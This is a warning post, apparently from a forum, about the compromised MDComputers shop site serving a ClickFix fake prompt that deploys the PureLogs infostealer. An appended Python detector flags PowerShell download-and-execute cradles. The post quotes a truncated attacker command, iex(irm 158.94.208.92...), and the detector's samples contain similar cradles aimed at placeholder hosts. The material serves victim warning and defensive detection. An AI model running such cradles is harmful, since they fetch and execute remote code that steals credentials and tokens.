Just a massive heads up if you are planning to browse or buy anything from MDComputers. Do not visit the site, and absolutely do not make any payments or enter details there. Not only right now. Ever.
The site is built on WordPress and has clearly been severely compromised. This is the second time I have caught it attempting to launch critical attacks directly against visitors.
Specifically, it is currently serving a "ClickFix" fake browser update/verification prompt. If you interact with it, it forces your system to execute a malicious PowerShell command: iex(irm 158.94.208.92...).
This is not a false positive. That command pulls down a fileless threat designed to unpack and execute an infostealer binary (PureLogs Stealer) straight into memory. It targets your saved browser credentials, session cookies, crypto wallets, and 2FA authentication tokens.
If you have visited the site recently and noticed any weird pop-ups or ran a command it told you to copy-paste, change your critical passwords from a different device immediately, terminate all active web sessions, and run a deep offline malware scan.
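For defenders triaging this kind of report, here is an added example (not part of the original post) that scans process command lines or PowerShell script-block log text for the download-and-execute pattern quoted above, `iex(irm <host>...)`, and raises severity when the host is a bare IP address. The function names and the sample lines are hypothetical; the samples are constructed and use documentation-range addresses, not real indicators.

```python
import ipaddress
import re

# PowerShell aliases and full cmdlet names for "fetch" and "execute".
FETCH = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget)"
EXEC = r"(?:iex|invoke-expression)"
# Both orderings of the cradle: iex(irm URL)  and  irm URL | iex
CRADLE = re.compile(
    rf"\b{EXEC}\b[\s(&]*\b{FETCH}\b\s+(?P<a>[^\s|)]+)"
    rf"|\b{FETCH}\b\s+(?P<b>[^\s|)]+)[^|]*\|\s*\b{EXEC}\b",
    re.IGNORECASE,
)

def host_of(target):
    """Strip quotes, scheme, path and port from the fetched target."""
    t = target.strip("'\"")
    t = re.sub(r"^[a-z]+://", "", t, flags=re.IGNORECASE)
    return t.split("/")[0].split(":")[0]

def classify(command_line):
    """Return None, or a dict describing the download-and-execute cradle."""
    m = CRADLE.search(command_line)
    if not m:
        return None
    host = host_of(m.group("a") or m.group("b"))
    try:
        ipaddress.ip_address(host)
        raw_ip = True
    except ValueError:
        raw_ip = False
    return {"host": host, "raw_ip": raw_ip,
            "severity": "high" if raw_ip else "medium"}

# Constructed sample command lines (TEST-NET addresses, not real indicators).
SAMPLES = [
    "powershell -w hidden -c iex(irm 203.0.113.7/x)",
    "powershell.exe -NoP Invoke-RestMethod http://198.51.100.9:8080/a | Invoke-Expression",
    "powershell -c \"iwr 'https://updates.example.test/v.ps1' | iex\"",
    "powershell -c Get-ChildItem C:\\Users",
    "powershell -c irm https://api.example.test/status",
]

def scan(lines):
    """Return (line, finding) pairs for every line that contains a cradle."""
    return [(l, r) for l in lines if (r := classify(l))]

if __name__ == "__main__":
    for line, hit in scan(SAMPLES):
        print(hit["severity"], hit["host"], "<-", line)
```

A fetch with no execute step (the last sample) is deliberately not flagged, so the rule stays quiet on ordinary API calls.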
